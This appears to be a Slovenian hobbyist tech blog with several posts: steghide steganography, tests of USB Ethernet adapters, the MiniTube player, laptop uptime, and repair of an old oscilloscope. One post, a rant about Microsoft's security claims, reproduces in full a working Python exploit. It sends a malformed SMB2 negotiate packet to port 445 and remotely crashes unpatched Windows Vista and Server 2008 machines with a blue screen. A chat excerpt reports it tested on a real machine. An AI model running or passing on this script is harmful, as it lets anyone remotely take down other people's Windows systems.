Another day in a geek’s life

Steganografija je znanost skrivanja sporočil

Pred kratkim sem naletel na program Steghide, ki zna skriti sporočila¹  v naprimer jpeg slike;  (v gentooju je že vključen v main portage tree), zanimalo me je pa, kako opazna je razlika po vstavljenem sporočilu.

Za primer sem vzel 254kB veliko sliko:

ter sporočilo:

It is not too late to turn back from the GATES of hell.
Use Linux - the free 32 bit operating system.

Za skritje sporočila je potrebno v terminalu vpisati:

steghide embed -cf slika.jpg -ef sporocilo.txt

Program vpraša za geslo (uporabil sem “abc”), in v sliko vstavi sporočilo.

Nova slika izgleda tako:

Če primerjam slike:

Razlika je res neopazna s prostim očesom.

Tudi če uporabimo večje sporočilo (128kb teksta, 4kb pri bzip2 -9):

..je razlika spet skoraj neopazna s prostim očesom,… če primerjamo:

ps: sporočilo spet dobimo “ven” z ukazom:

steghide extract -sf slikassporocilom.jpg

..in seveda geslom

pps: steghide uporablja tudi enkripcijo² in kompresijo.  Podpira shranjevanje poljubnih datotek v jpeg, bmp, wav in au datoteke. Če je sporočilo/datoteka  preveliko/a, nam to program sporoči.  Uporabi tudi checksum, da preveri, če so podatki nepoškodovani.

geek stuff hiding, message, privacy, steganography, steghide

Ker še nisem videl prenosnika, z več kot enim vgarjenim mrežnim vmesnikom, sem za ‘igranje’ potreboval še vsaj enega zunanjega, po moćnosti na USB vodilu.

Ker vse take naprave izdelujejo Kitajci s skoraj istim naborom čipov, sem med cenejšimi variantami (<10usd) zasledil mnogo derivatov le dveh naborov čipov.

Prvi je (cenejši – ~3.5usd), možne so različne barve, a oblika ohišja je enaka:

Switchu se predstavi kot 100mbit naprava, računalniku pa kot:

[114932.537055] usb 5-2: new full speed USB device using uhci_hcd and address 23
....
[114932.850659] eth3: register 'dm9601' at usb-0000:00:1d.0-2, Davicom DM9601 USB Ethernet, ...
[114932.850693] usbcore: registered new interface driver dm9601
...
[114969.289118] eth3: link up, 100Mbps, full-duplex, lpa 0xC5E1

Seveda dobimo IP prek DHCP-ja in internet dela.

Drug vmesnik je malo dražji (~8usd), zasledil sem le črno varianto:

Tudi ta se prikaže kot 100mbit naprava, v dmesgju pa tu vidimo:

[115061.187061] usb 2-2: new high speed USB device using ehci_hcd and address 29
...
[115061.383165] eth1: register 'MOSCHIP usb-ethernet driver' at usb-0000:00:1d.7-2, MOSCHIP 7830/7730 usb-NET adapter, ...

Razen čipa, naizgled delujeta enako ‘dobra’, a treba povdariti na razliko med usb “Full speed” (USB1.1 full speed – 12Mbps) ter “High speed” (USB2.0 480Mbps). Tukaj pa se pojavi vprašanje smiselnosti 100Mbitne povezave ki deluje na 12Mbitnem usb-ju?

Seveda sem z iperf-om stestiral¹ povezavo, in za zgornji, usb1.1 model prišel do hitrosti 9.60Mbit down, in 9.63Mbit up (kar je seveda realno za USB1.1, a bolj sodi k 10Mbitni povezavi namesto reklamirane 100Mbit (čeprav se tako predstavi ostalim mrežnim napravam)). Za spodnji, USB2.0 model, pa sem nameril ~93Mbit-ov up, ter ~96Mbit-ov down, kar je že kar prijetna hitrost za delo.

Tako da…. če se kdo odloča za nakup kakega USB vmesnika, je dobro prvo preveriti, če vsaj v teoriji lahko doseže napisane hitrosti, torej če vsaj podpira USB2.0. (in seveda če dela na Linuxu ;D).

PS: Oba izdelka sem kupil in plačal sam, nihče me ne plačuje za test, in blog-post ni mišljen kot reklama. Komentarji prikazujejo moje lastno mnenje.

geek stuff davicom, ethernet, iperf, moschip, test, usb

Youtube… muzika, požigalci, smešni clipi…. zakon!

In potem pride Flash player, začasno zmrznjen browser, full screen, ki izgine ko zamenjaš namizje, in cela kopica drugih #failov povezanih s flashom.

A končno (“or did hell really freeze over?”), sem našel native aplikacijo, za predavajanje youtube posnetkov. Imenuje se MiniTube, potrebuje qt>4.5, phonon (in očitno še phonon-kde), ter doberšen nabor gstreamer pluginov (bad, ugly, ffmpeg,…).

Sicer ne dela na windowsih, ampak itak… kdo sploh še uporablja ta crap?

Screenshot:

Minitube

geek stuff, spam minitube, youtube

Kot sem že pisal, imam server na prenosnem račulaniku… in ker je v geek-svetu uptime neke vrste dick-size (no ja.. lahko tudi non-geek uptime, eaither-way, bigger||longer==better), se je treba vsake toliko malo pohvalit Nažalost sem zaradi žurke v kiberpipi in podobnih dogodkov zamudil 600-i dan, a tudi 602 je dovolj dober

Torej uptime ob času pisanja (trenutni je tukaj):

mulaz@lilly ~ $ uptime
19:07:40 up 602 days,  8:49,  2 users,  load average: 0.12, 0.37, 0.99

Seveda je bil laptop nekajkrat vmes tudi očiščen, a nikoli izklopljen, dan v spanje, hiberniran, ali karkoli kar bi pomenilo da ni “up”

PS: mogoče bi bil že čas za restart… a se bojim da se kak kos hardware-a po restartu nebi več pobral…. :/

geek stuff lilly, uptime

Pred par dnevi je na slashdotu pojavil topic¹  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 “ql”, in kok je Linux “beden”.  Konkreten slajd, ki mi je privlekel pozornost je bil tudi:

Torej… ko pride do kakega grdega b00ga, exploita ipd, so userji “on their own”, če uporabljajo Microsoft priozvode, so pa “safe and secure”…

No in danes mi je @Kostko poslal zanimiv link (click here), kjer se nahaja kratka python skripta, ki na oddaljeni mašini sproži BSOD.  In kako je sedaj z ‘zagarantirano varnostjo’? Citiram:

Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.

Hmm.. očitno bo najbolje da izklopimo M$ file serverje, zakurimo ogenj in čakamo

In za vsak slučaj, da ne bi exploit kam izginil, dajem kopijo sem:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
 
)
s = socket()
 
s.connect(host)
s.send(buff)
s.close()

ps:  zadeva se je pojavila tudi na slashdotu (click here)

pps:

(21:19:09) Anze: na zobavniku potrjeno bsod dela na visti
(21:19:12) Anze: win7 je safe <--????
(21:19:16) Anze: win 2k8 pade

geek stuff, rant 0-day, exploit, linux, microsoft, python

V Beogradu na Kalenić pijaci sem našel tole igračko, za relativno nizko ceno (cca 15eur). Sond za njega nažalost (še) nimam, a imam v načrtu predelavo konektorjev v klasične BNC. Popolnoma stestiral ga zato še nisem, a tudi brez sond lepo prikazuje 50Hz šum.

Večina stvari (vsaj na prvi pogled) deluje… za tiste za katere ne vem kaj naj bi počele, pa upam da bom uspel dobiti originalna navodila zanj. Prav tako mislim da bo potrebno zamenjati nekaj elektrolitov, a to je malenkost.

Na zadnji strani je tudi zanimiv priključek X1, za katerega ugibam da naj bi predstavljal neko zunanje proženje (upam). Vidi se pa tudi letnica 1983, in kratica ZIP, ki upam da je ime podjetja ki ga je izdelalo. Googlanje za ‘zip’-om še ni bilo uspešno… ampak upam da se bo našlo kaj.

Torej ja… i can has a new toy!

Edit 1: Treba je bilo prelotat ene dva kabla in sedaj lepo prikazuje signal… problem je le, da je slika razhlo postrani, tako da bom jutri (torej danes, samo po tem ko grem spat in se spet zbudim) pregledal odklonski sistem (ali pa zavrtel celo katodno cev)

Edit 2: Katodna cev naravnana in fiksirana, napajalni kabel zamenjan z dalšim, in ozemljitev pobrana z energetskega omrežja.  Konektorjev še nisem zamenjal z bnc-ji, ker mislim da bo treba povečat luknje, a nisem 100%.  Zazdaj dela brez problema

ps:  Zahvala Branku za navodila

elektro stuff, geek stuff cccp, osciloskop, toy